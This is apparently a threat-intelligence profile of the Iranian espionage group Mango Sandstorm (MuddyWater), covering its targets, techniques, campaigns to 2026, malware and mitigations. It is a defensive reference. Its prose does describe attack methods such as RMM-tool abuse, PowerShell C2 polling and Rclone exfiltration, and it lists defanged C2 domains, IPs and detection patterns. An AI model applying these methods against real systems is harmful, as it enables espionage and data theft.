mango-sandstorm

Mango Sandstorm / Mercury

also known as: MuddyWater TA450 Seedworm Static Kitten Earth Vetala TEMP.Zagros Boggy Serpens mitre: G0069

Iran's MOIS-subordinate espionage group, active since at least 2017 with one of the broadest geographic footprints among Iranian APTs — covering the Middle East, Asia, Africa, Europe, and North America. Known operationally as MuddyWater by vendors, the group shifted in 2023–2024 from PowerShell-heavy scripts to abusing legitimate remote monitoring and management (RMM) tools — Atera, SimpleHelp, ScreenConnect, and others — as their primary foothold mechanism, blending C2 traffic with normal IT operations and significantly increasing detection difficulty. Concurrently developing a generation of custom C2 frameworks (PhonyC2, MuddyC2Go, DarkBeatC2) and backdoors (BugSleep, MuddyViper, Dindoor), while coordinating with DEV-1084 for destructive wiper operations. Active intrusions against US critical infrastructure were confirmed through early 2026.

attributed originIran — Ministry of Intelligence and Security (MOIS)

formal attributionUS CYBERCOM + CISA — January 2022

mitre group idG0069 (MuddyWater)

active sinceAt least 2017 (likely earlier)

defining shift2023: RMM tool abuse replacing PowerShell for initial foothold

Sectors: Telecom, Government, Defense, Energy, Oil & Gas

geographic scopeMiddle East, Asia, Africa, Europe, North America

key toolingBugSleep, DarkBeatC2, Atera/RMM, MuddyViper, Dindoor

current statusACTIVE — US critical infra intrusions confirmed 2026

Overview

Mango Sandstorm — the current Microsoft designation for the group most widely known as MuddyWater — is formally attributed to Iran's Ministry of Intelligence and Security (MOIS) as a subordinate element conducting cyber espionage on MOIS's behalf. The attribution was made public by US Cyber Command and CISA in January 2022, confirming what researchers had assessed based on targeting alignment and Iranian IP address exposure since the group's first appearance in 2017. The group's primary mission is long-term persistent access for intelligence collection — it does not conduct financially motivated attacks, and its destructive operations are coordinated through partner threat actors rather than executed with its own tooling directly.

The group's defining characteristic through its first several years was an evolving PowerShell-based toolkit — the POWERSTATS backdoor and subsequent custom PowerShell loaders that changed incrementally with each public exposure. This approach, while adaptive, generated a consistent behavioral signature that defenders learned to detect. Beginning in 2021 and accelerating significantly after October 2023, the group shifted its primary initial access strategy toward abusing legitimate remote monitoring and management (RMM) tools. By deploying commercially licensed software like Atera Agent, SimpleHelp, ScreenConnect, RemoteUtilities, and N-able as their foothold mechanism, the group's C2 traffic becomes nearly indistinguishable from legitimate IT management traffic — a significant detection evasion improvement over custom PowerShell loaders.

The October 2023 Hamas attack on Israel and the subsequent Israeli military response triggered a notable escalation in Mango Sandstorm activity. HarfangLab documented a surge in Atera Agent deployment campaigns beginning immediately after October 7, 2023, targeting Israeli organizations across multiple industries. This post-October 2023 wave extended to businesses in India, Algeria, Turkey, Italy, and Egypt — consistent with the group's broad geographic scope while intensifying Israeli targeting.

Simultaneously, the group continued investing in custom C2 framework development. Deep Instinct documented DarkBeatC2 in April 2024 — the latest in a succession of custom frameworks including MuddyC3, PhonyC2, MuddyC2Go, and SimpleHarm. Each framework uses PowerShell for C2 communication over HTTPS with TLS 1.2, polling C2 servers in a loop with configurable sleep intervals. The BugSleep implant, documented in mid-2024, and MuddyViper, documented by ESET between September 2024 and March 2025 against Israeli organizations, extended the group's custom malware family further.

A particularly significant intelligence finding came from Amazon Threat Intelligence in November 2024: Mango Sandstorm operators were documented having accessed compromised servers containing live CCTV feeds prior to attacks in Israel and the Red Sea. This correlation between pre-positioning on surveillance infrastructure and subsequent kinetic military operations — while not establishing a direct causal link — raised documented concerns about MOIS providing tactical intelligence support to Iranian military and proxy operations. In early 2026, FBI and CISA reported Mango Sandstorm-linked activity backdooring US critical infrastructure including a bank, an airport, and a non-profit, using the Dindoor backdoor and DarkBeatC2 implants.

Target Profile

Mango Sandstorm has one of the broadest documented target geographies of any Iranian APT, reflecting MOIS's global intelligence collection mandate across adversaries, partners, and neutral parties alike.

Middle East — Government, Telecom, Energy (primary): Gulf Cooperation Council member states are heavily targeted, with documented intrusions across UAE government ministries and telecommunications, Saudi Arabian energy and government agencies, Kuwaiti government networks and banking, Bahraini telecommunications, and Qatari and Omani critical infrastructure. Israel has been an intensive focus since at least 2023, with campaigns targeting government agencies, defense sector, IT companies, airlines, pharma, and manufacturing. Turkey, Jordan, Iraq, and Afghanistan have also appeared repeatedly across multi-year campaign documentation.
Asia — India, Pakistan, Azerbaijan: Government entities and critical infrastructure across South Asia and the Caucasus. India has appeared in multiple campaign victim lists including the October 2023–2024 Atera Agent wave. Pakistan has been targeted in coordination with campaigns against neighboring countries with overlapping geopolitical interest for MOIS.
Africa: Algeria was identified among targets in the October 2023 Atera wave. Broader African targeting reflects MOIS intelligence requirements across the African Union states where Iranian diplomatic engagement and economic interests have expanded.
Europe — NATO States: Belgium, Italy, and other European targets have appeared in documented campaigns. European targeting primarily reflects espionage against NATO-member organizations connected to Middle East policy and sanctions enforcement.
North America — US Critical Infrastructure: FBI and CISA confirmed Mango Sandstorm-linked activity backdooring US critical infrastructure in early 2026 — a bank, an airport, and a non-profit — using Dindoor and DarkBeatC2. Earlier US targeting documented by MITRE ATT&CK spans government, defense, and oil and gas organizations.
Sector priorities across all geographies: Telecommunications (providing communications intelligence), government (diplomatic and policy intelligence), defense and military, oil and natural gas, and critical infrastructure. The group's consistent sector focus across all geographies reflects stable MOIS collection priorities rather than opportunistic targeting.

Tactics, Techniques & Procedures

Mango Sandstorm has undergone the most significant TTP evolution of any Iranian APT in the 2023–2025 period. The shift from PowerShell backdoors to RMM tool abuse represents a deliberate evasion adaptation rather than a capability gap — the group continues developing custom malware while adding legitimate tool abuse as a first-stage layer.

mitre id	technique	description
T1566.001/002	Spear-Phishing — RMM Delivery	The primary initial access vector since 2021, now dominant. Spearphishing emails deliver links to file-sharing services (Egnyte, Onehub, Sync, TeraBox) hosting ZIP archives containing RMM installer packages. A notable 2024 innovation: PDF attachments containing malicious embedded links replacing direct email links — documented by Proofpoint in March 2024 against Israeli employees of multinational organizations using salary-related lures. Some messages are sent from compromised .IL (Israeli) business email accounts to maximize credibility. Social engineering themes include flight status tools, regional development programs, cybersecurity webinars, and online courses.
T1219	Remote Access Tools — RMM Software Abuse	The defining TTP shift of the 2023–2025 period. Rather than deploying custom backdoors as first-stage tools, Mango Sandstorm deploys commercially licensed RMM products — Atera Agent, SimpleHelp, ScreenConnect, RemoteUtilities, Syncro, N-able — as their initial foothold. These tools have legitimate certificates, are recognized by endpoint security products as trusted software, communicate over standard HTTPS, and generate traffic indistinguishable from legitimate IT management activity. The group has tested multiple RMM products and currently favors Atera. When RMM tool detection rates increase following vendor disclosure, the group switches to alternative products or reverts to custom implants.
T1190	Exploit Public-Facing Application	Vulnerability exploitation complements the spearphishing model. Documented exploitation includes Log4Shell (CVE-2021-44228) in SysAid servers, PaperCut print management (CVE-2023-27350), and internet-facing application vulnerabilities in general. The MERCURY + DEV-1084 destructive campaign documented by Microsoft in April 2023 used Log4j exploitation as a probable entry vector into hybrid Azure/on-premises environments.
T1059.001	PowerShell — Custom C2 Frameworks	Mango Sandstorm has developed a succession of custom C2 frameworks all using PowerShell as their execution layer: MuddyC3, PhonyC2 (June 2023), MuddyC2Go (November 2023, written in Go), DarkBeatC2 (April 2024). Each framework polls a C2 server via PowerShell HTTPS requests (Invoke-WebRequest with TLS 1.2) in a sleep loop, executes received scriptblock content, and writes results back to the C2. DarkBeatC2 specifically uses response content checks for the string "SRT_" to determine sleep duration adjustments. This framework succession reflects continuous development investment despite the simultaneous shift to RMM tool abuse.
T1588.001	BugSleep, MuddyViper, Dindoor — Custom Implants	BugSleep (first documented mid-2024) is a Python-based implant providing system information gathering, persistence, interactive shell, and file upload/download. Phoenix, documented by Group-IB as a lightweight BugSleep variant, added browser credential stealing (Brave, Chrome, Edge, Opera). MuddyViper was deployed by ESET against Israeli organizations between September 2024 and March 2025. Dindoor, a Deno runtime-based backdoor, was used in February 2026 US infrastructure intrusions alongside Fakeset (Python-based, with code-signing certificate lineage to earlier MuddyWater families). Rclone is used for data exfiltration to Wasabi cloud storage, blending with legitimate cloud traffic.
T1003.001	Credential Dumping — LSASS and Browser Credentials	Post-initial-access credential collection proceeds via LSASS memory dumping using standard Windows tools and custom Mimikatz variants. Browser credential harvesting (Chrome, Firefox, Edge, Brave, Opera) is documented in recent BugSleep/Phoenix variants, reflecting expansion beyond Windows credential stores into the browser credential ecosystem that many organizations do not adequately protect. Harvested credentials support lateral movement and account takeover for subsequent spearphishing from compromised legitimate email accounts.
T1485	Destructive Collaboration — DEV-1084 / DarkBit	Microsoft's April 2023 report documented MERCURY providing initial access to DEV-1084 (also known as DarkBit), which then executed destructive wiper attacks against hybrid Azure/on-premises environments — deleting Azure resources, distributing ransomware-like disk wipers on-premises, and operating a fake ransomware payment portal with no actual decryption. The hand-off model mirrors Moses Staff's approach: an espionage-focused group achieving access and passing it to a destruction-focused actor. DEV-1084 uses MERCURY-associated infrastructure including IP address 146.70.106[.]89, MULLVAD VPN, and the C2 domain vatacloud[.]com.

RMM as malware — the detection gap

Mango Sandstorm's shift to legitimate RMM tools as first-stage C2 infrastructure exploits a specific gap in most organizations' detection posture: RMM products are trusted by endpoint security, generate no behavioral alerts on execution, communicate over standard HTTPS to vendor cloud infrastructure, and are indistinguishable from legitimate IT administration traffic. An Atera Agent deployed by an attacker looks identical to one deployed by an IT department. Organizations defending against this group must implement RMM software inventory controls, alert on any RMM product installation not authorized through an approved change process, and monitor for RMM agent communications from endpoints where no RMM product was previously installed.

Known Campaigns

Mango Sandstorm's campaign history spans nearly a decade of continuous operation, with the most significant documented activity concentrated from 2022 to early 2026.

Initial Middle East Campaigns — POWERSTATS Era 2017–2021

MuddyWater first appeared in 2017 targeting government and private organizations in Saudi Arabia, Iraq, Israel, UAE, Georgia, India, Pakistan, Turkey, and the United States. The defining tool was POWERSTATS — a PowerShell-based first-stage backdoor that evolved incrementally across multiple campaigns. Despite public exposure, the group continued operating with only minor changes, demonstrating the characteristic resilience of MOIS-linked operations. US Cyber Command officially attributed the group to MOIS in January 2022, publishing a suite of malware samples used by Iranian government-sponsored actors.

MERCURY + DEV-1084 — Hybrid Cloud Destructive Attack 2022–2023 (disclosed April 2023)

Microsoft documented a coordinated destructive operation in which MERCURY (Mango Sandstorm) achieved initial access via Log4j exploitation and passed that access to DEV-1084, which then executed a multi-phase destructive campaign: on-premises disk encryption and deletion, destruction of Azure cloud resources including virtual machines, storage accounts, and virtual networks, and operation of a fake DarkBit ransomware payment portal with no actual decryption capability. The hand-off between the espionage-focused MERCURY and the destructive DEV-1084 mirrors the Moses Staff model and reflects a MOIS organizational approach in which different capabilities are maintained in coordinated but distinct operational cells.

Rashim Software Supply Chain — Israeli Academic Sector 2023–2024

Deep Instinct and OP Innovate documented a supply chain attack in which the group (using the "Lord Nemesis" faketivist persona) compromised Rashim Software — an Israeli IT provider — and used privileged credentials to access Rashim's clients in the Israeli academic sector. Rashim notified over 200 customers of the breach in March 2024, four months after the initial compromise. This supply chain approach — compromising a single IT vendor to access its entire client base — reflects growing operational sophistication and a shift toward indirect access paths that are harder to detect until significant secondary compromise has occurred.

Post-October 2023 Atera Wave — Israel and Regional Targets October 2023 – April 2024

Beginning immediately after the October 7, 2023 Hamas attack, Mango Sandstorm significantly intensified its targeting of Israeli organizations using Atera Agent as the primary foothold mechanism. HarfangLab documented the escalation and its continuation through April 2024, covering businesses in Israel, India, Algeria, Turkey, Italy, and Egypt across sectors including airlines, IT companies, telecom, pharma, automotive manufacturing, logistics, travel, and tourism. Spearphishing lures referenced the Golan Regional Council development program, flight status utilities, and other geopolitically relevant themes. In March 2024, Proofpoint documented a shift to PDF attachments with embedded links — a new delivery refinement to avoid plain-text email link detection.

BugSleep and MuddyViper — Custom Implant Evolution 2024

Check Point Research and Group-IB documented BugSleep in mid-2024 — a Python-based implant targeting Turkey, Azerbaijan, Jordan, Saudi Arabia, Israel, and Portugal. The lightweight Phoenix variant of BugSleep added browser credential stealing (Chrome, Firefox, Edge, Brave, Opera) and was found on attacker C2 infrastructure alongside RMM utilities. ESET separately documented MuddyViper deployment against Israeli organizations between September 2024 and March 2025. The simultaneous development of RMM-based access and custom implants reflects a layered strategy: RMM tools for initial persistent access, custom implants for specialized collection objectives that RMM software cannot fulfill.

CCTV Pre-Positioning — Kinetic Operation Support November 2024 (Amazon disclosure)

Amazon Threat Intelligence disclosed in November 2024 that Mango Sandstorm operators had accessed compromised servers containing live CCTV camera feeds at locations in Israel and the Red Sea prior to attacks in those areas. The correlation between MOIS access to physical surveillance infrastructure and subsequent kinetic military or proxy operations — while not establishing a direct causal chain — was assessed as significant intelligence support activity, potentially providing MOIS with situational awareness of locations prior to Iranian proxy actions. This represents a documented extension of cyber intrusion capability into tactical intelligence support for kinetic operations.

Dindoor/Fakeset — US Critical Infrastructure Backdooring February 2026 (confirmed March 2026)

A February 2026 coordinated intrusion campaign targeting US, Israeli, and Canadian organizations — confirmed by FBI and CISA — used the Dindoor backdoor (Deno runtime-based) and Fakeset (Python-based, with code-signing certificate lineage to prior MuddyWater families including Stagecomp and Darkcomp). Confirmed victims included a US bank, a US airport, a non-profit, and an Israeli software company. Data was exfiltrated via Rclone to Wasabi cloud storage. The campaign was assessed as strategic pre-positioning and intelligence collection during a period of geopolitical escalation following US government actions related to Iran.

Tools & Malware

Mango Sandstorm operates the most diverse and continuously evolving toolchain of any Iranian APT — combining a custom C2 framework succession with legitimate RMM tool abuse and a growing portfolio of custom implants.

Legitimate RMM Tools (Atera, SimpleHelp, ScreenConnect, RemoteUtilities, N-able, Syncro): The primary first-stage mechanism since 2021. Atera Agent is the current preferred tool following a period of SimpleHelp use in 2023. Installer packages are distributed through phishing delivery chains and, once installed, provide the operators with full remote management capability indistinguishable from legitimate IT administration traffic. The group configures the RMM agents with operator-controlled email addresses or accounts before distributing installer packages.
DarkBeatC2: The most recent custom C2 framework (documented April 2024), using PowerShell for C2 communication over HTTPS/TLS 1.2 via Invoke-WebRequest. Polls C2 in a loop with 20-second sleep intervals, checks response content for "SRT_" sleep-adjustment strings, converts non-null responses into scriptblock and executes them. Hosted on infrastructure in subnets previously associated with PhonyC2 and MuddyC2Go campaigns.
PhonyC2 and MuddyC2Go: Prior-generation custom C2 frameworks. PhonyC2 (June 2023) uses a similar PowerShell polling model; MuddyC2Go (November 2023) is written in Go rather than Python/PowerShell, representing a language shift to reduce detection by tools trained on Python or PowerShell malware signatures. Both succeeded SimpleHarm and MuddyC3.
BugSleep and Phoenix: Python-based implants documented in mid-2024. BugSleep provides system information gathering, persistence, interactive shell, and file upload/download. Phoenix is a lighter-weight variant adding browser credential stealing from Brave, Chrome, Edge, and Opera. Infrastructure hosting Phoenix also serves RMM utilities, indicating a role as a combined credential theft and access maintenance tool.
MuddyViper: A backdoor deployed against Israeli organizations between September 2024 and March 2025 per ESET research. Details are limited in public reporting but represent a distinct implant family from BugSleep.
Dindoor (Deno-based) and Fakeset (Python): The most recently documented implant generation (February 2026 US infrastructure campaign). Dindoor is notable for using the Deno runtime — a less common execution environment that reduces detection by tools trained primarily on Python and PowerShell. Fakeset's code-signing certificate lineage directly links it to earlier MuddyWater families (Stagecomp, Darkcomp), providing a strong attribution anchor despite the new malware family designation.
POWERSTATS and Historical PowerShell Loaders: The foundational tool across 2017–2021 campaigns. A PowerShell-based backdoor providing basic C2 functionality through iterative script updates. Still referenced in attack analysis as the original MuddyWater signature capability, though now superseded by the RMM and custom framework approach.
Rclone: An open-source cloud sync tool used for data exfiltration, directing collected material to Wasabi cloud storage buckets. By using a legitimate cloud service with a known commercial utility, exfiltration traffic is nearly indistinguishable from authorized cloud backup or sync operations.

Indicators of Compromise

Mango Sandstorm's most current threat indicators reflect the RMM tool abuse model and custom C2 frameworks. Static infrastructure IOCs rotate frequently; behavioral indicators are more durable.

RMM abuse behavioral indicators

behaviorAtera Agent / SimpleHelp / ScreenConnect installed without IT change management authorization

behaviorRMM installer package downloaded via email link to Egnyte, Onehub, Sync, or TeraBox

behaviorPDF attachment with embedded file-sharing link as phishing delivery vector

behaviorAtera Agent configured to operator-controlled email address (not matching organization's IT domain)

indicatorPhishing email received from compromised .IL (Israeli) business email account

DarkBeatC2 / custom framework indicators

behaviorPowerShell Invoke-WebRequest polling external HTTPS URL in 20-second loop — DarkBeatC2 pattern

behaviorPowerShell scriptblock creation and execution from HTTP response content

behaviorC2 response checked for "SRT_" string prefix — DarkBeatC2 sleep adjustment mechanism

domaingooglevalues[.]com — DarkBeatC2 associated domain (historical, February 2024)

domainvatacloud[.]com — DEV-1084/MERCURY collaboration C2 domain

ip146.70.106[.]89 — MERCURY/DEV-1084 collaboration IP (historical)

Dindoor/Fakeset — February 2026 campaign

c2 server159.198.36[.]115 — Phoenix/BugSleep C2 also hosting RMM utilities (2025)

exfilRclone configured to Wasabi cloud storage buckets — exfiltration blends with cloud sync traffic

exfilBackblaze B2 storage services — staging infrastructure used in Dindoor campaigns

cert lineageFakeset code-signing certificates previously associated with Stagecomp and Darkcomp MuddyWater families

runtimeDeno runtime execution — unusual execution environment, monitor for deno.exe in unexpected contexts

Mitigation & Defense

The RMM tool abuse model fundamentally changes the defensive challenge: standard malware detection is ineffective against signed, commercial software. Defense must shift to authorization-based controls.

Implement RMM software inventory and unauthorized installation alerting: Maintain an approved list of RMM products authorized for use in your environment. EDR and endpoint management policies should alert — or block — any RMM product installation that was not initiated through an approved change management process. Atera Agent, SimpleHelp, ScreenConnect, and RemoteUtilities appearing on endpoints where they were not previously present should generate immediate security alerts regardless of the legitimacy of the software itself.
Monitor for RMM network traffic from unexpected endpoints: RMM products generate characteristic outbound traffic to vendor cloud infrastructure. Network monitoring should alert on RMM protocol traffic originating from servers, industrial systems, or other endpoints where IT management tools have no legitimate role. Network segmentation that blocks RMM vendor cloud endpoint connectivity from these segments eliminates this attack vector for those environments.
Block PDF attachment links at email gateway and train users on the vector: Mango Sandstorm's 2024 shift to PDF attachments with embedded file-sharing links targets users who have been trained not to click links in email bodies but may not apply the same scrutiny to links within PDF attachments. Email security should extract and scan links from PDF attachments with the same rigor as email body links. User awareness training should explicitly address this variant.
Enable PowerShell Script Block Logging (Event ID 4104): DarkBeatC2 and prior custom C2 frameworks all execute via PowerShell scriptblocks. Script Block Logging captures the actual content of executed PowerShell scripts — including dynamically constructed scriptblocks assembled from C2 responses — and feeds it to SIEM detection rules. This is the single highest-value control for detecting Mango Sandstorm's custom C2 framework generation. Combining with AMSI integration enables real-time detection of malicious scriptblock content before execution completes.
Monitor Rclone and cloud sync tool execution for exfiltration: Rclone is the documented data exfiltration tool for the Dindoor/Fakeset campaign wave. DLP and endpoint controls should alert on Rclone execution — particularly when launched by processes not associated with authorized backup or sync workflows — and monitor outbound data volumes to Wasabi, Backblaze B2, and other object storage services from endpoints that have no legitimate business use of those services.
Patch Log4j, PaperCut, and internet-facing application vulnerabilities on an emergency basis: Log4Shell and PaperCut CVE-2023-27350 were both exploited by Mango Sandstorm well after patch availability. Any organization running unpatched versions of applications on CISA's Known Exploited Vulnerabilities catalog — particularly internet-facing — should treat them as active intrusion vectors. Vulnerability management programs that treat exploitation-confirmed CVEs as critical-priority patches within days of disclosure are the appropriate response posture for an organization in this threat group's targeting scope.
Alert on Deno runtime execution in enterprise environments: Dindoor uses the Deno runtime — a legitimate JavaScript/TypeScript execution environment with no common enterprise application use case. Any Deno runtime execution on enterprise endpoints (deno.exe) not associated with developer tooling should generate an immediate alert, as legitimate enterprise workloads have almost no reason to use Deno outside of development environments.

analyst note — CCTV access and kinetic operation timing

Amazon Threat Intelligence's November 2024 disclosure that Mango Sandstorm accessed compromised CCTV servers at locations in Israel and the Red Sea prior to attacks in those areas is among the more significant findings in recent Iranian APT reporting. While Amazon carefully noted the correlation rather than asserting a proven causal link, the documented temporal pattern — MOIS-linked operators accessing physical surveillance feeds at locations that were subsequently subject to kinetic attacks — raises documented questions about whether MOIS cyber operations include providing situational awareness support to Iranian military forces or proxy groups planning physical operations. If this assessment is accurate, it represents a meaningful expansion of what MOIS cyber capabilities are being used for: not only intelligence collection and espionage, but potentially tactical intelligence support for kinetic military planning.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile